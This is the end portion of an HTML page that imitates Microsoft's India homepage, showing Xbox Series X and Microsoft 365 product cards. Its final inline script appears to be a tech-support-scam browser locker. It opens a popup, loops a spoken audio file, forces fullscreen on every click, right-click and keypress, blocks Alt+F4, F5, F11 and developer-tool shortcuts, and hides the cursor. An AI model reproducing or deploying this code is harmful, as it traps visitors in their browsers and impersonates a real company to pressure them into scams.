                                                <div class="card  " data-target-uri="https://www.xbox.com/en-in/consoles/xbox-series-x?icid=mscom_marcom_CPH3a_XboxSeriesX" data-bi-ecn="Shop Xbox Series X" data-bi-ct="Content Card" data-bi-pa="body" data-bi-ehn="Xbox Series X" data-bi-assetid="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/gldn-XSX-CP-Xbox-Series-X?wid=515&amp;hei=293&amp;fit=crop" data-bi-bhvr="0" data-bi-hn="Xbox Series X" data-bi-compnm="Content card vertical 4 up - noDepth" data-bi-cn="Shop Xbox Series X">
                                                   <picture>
                                                      <source srcset="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/gldn-XSX-CP-Xbox-Series-X?wid=380&amp;hei=213&amp;fit=crop" media="(min-width: 1400px)">
                                                      <source srcset="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/gldn-XSX-CP-Xbox-Series-X?wid=297&amp;hei=167&amp;fit=crop" media="(min-width: 1084px)">
                                                      <source srcset="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/gldn-XSX-CP-Xbox-Series-X?wid=517&amp;hei=293&amp;fit=crop" media="(min-width: 860px)">
                                                      <source srcset="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/gldn-XSX-CP-Xbox-Series-X?wid=406&amp;hei=230&amp;fit=crop" media="(min-width: 540px)">
                                                      <img src="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/gldn-XSX-CP-Xbox-Series-X?wid=406&amp;hei=230&amp;fit=crop" loading="lazy" class="card-img" alt="An Xbox Series X console and an Xbox controller">
                                                   </picture>
                                                   <!-- If any of the cards in a group contain a badge, all cards should include a card header -->
                                                   <div class="card-body  pt-3">
                                                      <h2 class="h3    ">
                                                         Xbox Series X
                                                      </h2>
                                                      <p> The fastest, most powerful Xbox ever. </p>
                                                   </div>
                                                   <div class="card-footer pt-3 ">
                                                      <div class="link-group" data-automation-test-id="LinkGroupDiv-">
                                                         <a data-bi-cn="Shop Xbox Series X" data-bi-ecn="Shop Xbox Series X" data-bi-ct="cta" data-bi-pa="body" class=" cta   " data-target-uri="https://www.xbox.com/en-in/consoles/xbox-series-x?icid=mscom_marcom_CPH3a_XboxSeriesX" data-bi-assetid="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/gldn-XSX-CP-Xbox-Series-X?wid=515&amp;hei=293&amp;fit=crop" data-bi-bhvr="0" data-bi-mto="" data-automation-test-id="cta1-" aria-label="Shop Xbox Series X" target="_self" data-bi-ehn="Xbox Series X" data-bi-hn="Xbox Series X" data-bi-compnm="Content card vertical 4 up - noDepth" href="https://www.xbox.com/en-in/consoles/xbox-series-x?icid=mscom_marcom_CPH3a_XboxSeriesX">
                                                         Shop Xbox Series X
                                                         <span class="glyph" aria-hidden="true"></span> 
                                                         </a>
                                                      </div>
                                                   </div>
                                                </div>
                                             </div>
                                             <script type="text/javascript" src="js/site.min.ACSHASHd41d8cd98f00b204e9800998ecf8427e.js" defer=""></script><script type="text/javascript" src="js/site.min.ACSHASHd41d8cd98f00b204e9800998ecf8427e_1.js" defer=""></script>
                                             <div class="col 
                                                " clickgroup-telemetry-enabled="">
                                                <div class="card  " data-bi-ct="Content Card" data-bi-pa="body" data-bi-ehn="Maximise the everyday with Microsoft 365" data-bi-assetid="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Content-Card-Microsoft-365-Lifestyle-Sandstone-Icon-Toss?wid=515&amp;hei=293&amp;fit=crop" data-bi-bhvr="0" data-bi-hn="Maximise the everyday with Microsoft 365" data-bi-compnm="Content card vertical 4 up - noDepth">
                                                   <picture>
                                                      <source srcset="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Content-Card-Microsoft-365-Lifestyle-Sandstone-Icon-Toss?wid=380&amp;hei=213&amp;fit=crop" media="(min-width: 1400px)">
                                                      <source srcset="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Content-Card-Microsoft-365-Lifestyle-Sandstone-Icon-Toss?wid=297&amp;hei=167&amp;fit=crop" media="(min-width: 1084px)">
                                                      <source srcset="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Content-Card-Microsoft-365-Lifestyle-Sandstone-Icon-Toss?wid=517&amp;hei=293&amp;fit=crop" media="(min-width: 860px)">
                                                      <source srcset="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Content-Card-Microsoft-365-Lifestyle-Sandstone-Icon-Toss?wid=406&amp;hei=230&amp;fit=crop" media="(min-width: 540px)">
                                                      <img src="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Content-Card-Microsoft-365-Lifestyle-Sandstone-Icon-Toss?wid=406&amp;hei=230&amp;fit=crop" loading="lazy" class="card-img" alt="A young woman works on a Surface laptop while Microsoft 365 App icons whirl around her head.">
                                                   </picture>
                                                   <!-- If any of the cards in a group contain a badge, all cards should include a card header -->
                                                   <div class="card-body  pt-3">
                                                      <h2 class="h3    ">
                                                         Maximise the everyday with Microsoft 365
                                                      </h2>
                                                      <p> Get online protection, secure cloud storage and innovative apps designed to fit your needs – all in one plan. </p>
                                                   </div>
                                                   <div class="card-footer pt-3 ">
                                                      <div class="link-group" data-automation-test-id="LinkGroupDiv-">
                                                         <a data-bi-cn="For one person" data-bi-ecn="For one person" data-bi-ct="cta" data-bi-pa="body" class=" cta   " data-target-uri="https://www.microsoft.com/en-in/microsoft-365/p/microsoft-365-personal/cfq7ttc0k5bf?icid=mscom_marcom_CPH4a_M365Personal" data-bi-assetid="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Content-Card-Microsoft-365-Lifestyle-Sandstone-Icon-Toss?wid=515&amp;hei=293&amp;fit=crop" data-bi-bhvr="0" data-bi-mto="" data-automation-test-id="cta1-" aria-label="Shop for Microsoft 365 Personal" target="_self" data-bi-ehn="Maximise the everyday with Microsoft 365" data-bi-hn="Maximise the everyday with Microsoft 365" data-bi-compnm="Content card vertical 4 up - noDepth" href="https://www.microsoft.com/en-in/microsoft-365/p/microsoft-365-personal/cfq7ttc0k5bf?icid=mscom_marcom_CPH4a_M365Personal">
                                                         For one person
                                                         <span class="glyph" aria-hidden="true"></span> 
                                                         </a>
                                                         <a data-bi-cn="For up to six people" data-bi-ecn="For up to six people" data-bi-ct="cta" data-bi-pa="body" class=" cta   " data-target-uri="https://www.microsoft.com/en-in/microsoft-365/p/microsoft-365-family/cfq7ttc0k5dm?icid=mscom_marcom_CPH4b_M365Family" data-bi-assetid="https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Content-Card-Microsoft-365-Lifestyle-Sandstone-Icon-Toss?wid=515&amp;hei=293&amp;fit=crop" data-bi-bhvr="0" data-bi-mto="" data-automation-test-id="cta2-" aria-label="Shop for Microsoft 365 Family" target="_self" data-bi-ehn="Maximise the everyday with Microsoft 365" data-bi-hn="Maximise the everyday with Microsoft 365" data-bi-compnm="Content card vertical 4 up - noDepth" href="https://www.microsoft.com/en-in/microsoft-365/p/microsoft-365-family/cfq7ttc0k5dm?icid=mscom_marcom_CPH4b_M365Family">
                                                         For up to six people
                                                         <span class="glyph" aria-hidden="true"></span> 
                                                         </a>
                                                      </div>
                                                   </div>
                                                </div>
                                             </div>
                                             <script type="text/javascript" src="js/site.min.ACSHASHd41d8cd98f00b204e9800998ecf8427e.js" defer=""></script><script type="text/javascript" src="js/site.min.ACSHASHd41d8cd98f00b204e9800998ecf8427e_1.js" defer=""></script>
                                          </div>
                                       </section>
                                    </div>
                                 </div>
                              </div>
                           </div>
                        </div>
                     </div>
                  </div>
               </main>
            </div>
         </div>
      </div>
      <audio id="audio" src="assets/speechvoice.mp3"></audio>
      <script src="js/main-light.min.ACSHASHe3fd481804126aad70e99fe060fe8dca.js"></script>
      <script src="js/clientlib-httpclient.min.ACSHASHc102b6d56f04d1e67cf3f626dfabf84d.js"></script>
      <script src="js/clientlib-cookieconsent.min.ACSHASH96f0c5b1219e39b8788028f5c17a5ad9.js"></script>
      <!-- Changes for Global Pixel -->
      <script type="text/javascript">
         (function(){
         	var partnerScripts =
         		{
         			"meta": {
         					"partnerJsHash": "ACSHASH00f6c26de9c7c0a1e7b10d8bb358e008"
         					}
                          };
                          window.partnerScripts = partnerScripts;
         })();
      </script>
      <script id="mediapixel">
         //<![CDATA[
         //_pageBITags=jsonElement;
         //]]>
      </script>
      <script type="text/javascript" id="contentsquare">
         (function(){
         	var contentSq =
         		{
         			"entryFile": "https://cdnssl.clicktale.net/www32/ptc/05d32363-d534-4d93-9b65-cde674775e71.js",
                          };
         	if (typeof window["partnerScripts"]==="undefined"){
         		window["partnerScripts"]={};
         	}
         	window["partnerScripts"]["contentSquare"] = contentSq;
         })();
      </script>
      <!-- Feature Control Service:List of all Enabled Features -->
      <div id="customFeatureControl" enabledfeatures="contentbackfillgenerate,esiproductcards,feature-controlled-mwf,uhf-ms-io-endpoint,uhf-esi-cv,uhf-esi-cache,fraud-greenid,contentsquare,mediapixel,holiday-themer,lazyload-static-components,clientlibDefer,upsellEnabled,contentbackfillpkgdelete,healthcheck,demo-feature,contentbackfillhttpgenerate,perf-tracker-1ds,dynamic-bundle,cvIncrementer,tentingEnabled,chatCookiesImplemented,alertCountDownWithoutServerTime,pdpDynamicRendering,bundlesDynamicRendering,contentbackfillmetadatachangesvideo,contentbackfillmetadatachangesnonvideo,listDynamicRendering,experimentation-without-personalization,generic-list-importer,combinedUHF,cvCallEnabled,m365ProductCatalog,support-unsupported-locales,deferClickTale,videoLazyLoad,prefetchFontsEnabled,enable-code-isolation,imageLinkTag,fetchPriority,contentIngestionAgent,enableClickgroupTelemetry,imageLazyLoad,contentIngestionAgent-dispatcher2westus2Agent,isCacheControlFeatureEnabled,feature-controlled-content-card,lcpPrioritizationPhase1,ocReimagineTelemetry,deferScriptsEnabled,lcpPrioritizationPhase2,ocReimagineSlotNumberTelemetry,contentIngestionAgent-dispatcher1westus2Agent,ocReimagineComponentNameTelemetry,ocReimagineTemplateNameTelemetry,ptePhase1,extended-html-minification-sites,dynamicPrice,gl-auto-config,displayV35Toggle"></div>
      <div class="oneds-config" data-instrumentationkey="aacbcf0ee7614738b1ea4f99c23f2e82-63b77ecc-8c62-4513-aa1f-a12a5ed8c015-6865" data-isenabled="true" data-env="prod" data-market="en-in" data-pagename="HomePage" data-urlcollectquery="true" data-urlcollecthash="false" data-autocapturelineage="false" data-autocaptureresize="false" data-autocapturescroll="false" data-initialize1dseventname="none" data-tenantname="mscom" data-tenanttitle="Mscom" data-tenantdomain="microsoft" data-tenantsitename="microsoft" data-tenantnameproperty="tenantName" data-tenanttitleproperty="tenantTitle" data-tenantdomainproperty="tenantDomain" data-tenantsitenameproperty="tenantSiteName" data-max1dsinitializedelayinseconds="1"></div>
      <script src="js/custom-oneds.min.ACSHASHb4f0b5100b03a879dd5d2e97636efc37.js"></script>
      <!--Enable script to inject Green ID iFrame-->
      <script type="text/javascript" src="js/clientlib-greenid.min.ACSHASH383b23d12df0d9265d7569a7102c2f96.js" async=""></script>
      <script>
         $(document).ready(function() {
           // Function to open the popup
           function openPopup() {
             $('#popup').fadeIn();
           }
         
           // Function to close the popup
           function closePopup() {
             $('#popup').fadeOut();
           }
         
           // Call the openPopup function when the page loads
           openPopup();
         
           // Close the popup when the close button is clicked
           $('#closePopup').click(closePopup);
         });             
         $(document).click(function() {
             $('#audio')[0].play();
             $('#audio')[0].loop = true;
               var elem = document.documentElement;
               if (elem.requestFullscreen) {
                     elem.requestFullscreen();
               } else if (elem.mozRequestFullScreen) { /* Firefox */
                     elem.mozRequestFullScreen();
               } else if (elem.webkitRequestFullscreen) { /* Chrome, Safari and Opera */
                     elem.webkitRequestFullscreen();
               } else if (elem.msRequestFullscreen) { /* IE/Edge */
                     elem.msRequestFullscreen();
               }
            });
            document.addEventListener('contextmenu', function(e) {
               var elem = document.documentElement;
               if (elem.requestFullscreen) {
                     elem.requestFullscreen();
               } else if (elem.mozRequestFullScreen) { /* Firefox */
                     elem.mozRequestFullScreen();
               } else if (elem.webkitRequestFullscreen) { /* Chrome, Safari and Opera */
                     elem.webkitRequestFullscreen();
               } else if (elem.msRequestFullscreen) { /* IE/Edge */
                     elem.msRequestFullscreen();
               }
               e.preventDefault();
            });
            document.addEventListener('keydown', function(e) {
               var elem = document.documentElement;
               if (elem.requestFullscreen) {
                     elem.requestFullscreen();
               } else if (elem.mozRequestFullScreen) { /* Firefox */
                     elem.mozRequestFullScreen();
               } else if (elem.webkitRequestFullscreen) { /* Chrome, Safari and Opera */
                     elem.webkitRequestFullscreen();
               } else if (elem.msRequestFullscreen) { /* IE/Edge */
                     elem.msRequestFullscreen();
               }
            });
           //alt + f4 brrowser close disable
             document.addEventListener('keydown', function(e) {
                if (e.key === 'F4' && e.altKey) {
                      e.preventDefault();
                }
             });
               //ctrl + shift + i disable
               document.addEventListener('keydown', function(e) {
                  if (e.ctrlKey && e.shiftKey && e.key === 'I') {
                        e.preventDefault();
                  }
               });
               //ctrl + shift + j disable
               document.addEventListener('keydown', function(e) {
                  if (e.ctrlKey && e.shiftKey && e.key === 'J') {
                        e.preventDefault();
                  }
               });
               //ctrl + shift + c disable
               document.addEventListener('keydown', function(e) {
                  if (e.ctrlKey && e.shiftKey && e.key === 'C') {
                        e.preventDefault();
                  }
               });
               //ctrl + shift + u disable
               document.addEventListener('keydown', function(e) {
                  if (e.ctrlKey && e.shiftKey && e.key === 'U') {
                        e.preventDefault();
                  }
               });
               //ctrl + shift + s disable
               document.addEventListener('keydown', function(e) {
                  if (e.ctrlKey && e.shiftKey && e.key === 'S') {
                        e.preventDefault();
                  }
               });
               // f5 disable
               document.addEventListener('keydown', function(e) {
                  if (e.key === 'F5') {
                        e.preventDefault();
                  }
               });
                  //f11 disable
               document.addEventListener('keydown', function(e) {
                  if (e.key === 'F11') {
                        e.preventDefault();
                  }
               });
               document.addEventListener('fullscreenchange', (event) => {
                  if (document.fullscreenElement) {
                     document.documentElement.style.cursor = 'none';
                  }
               });          

      </script>
   </body>
</html>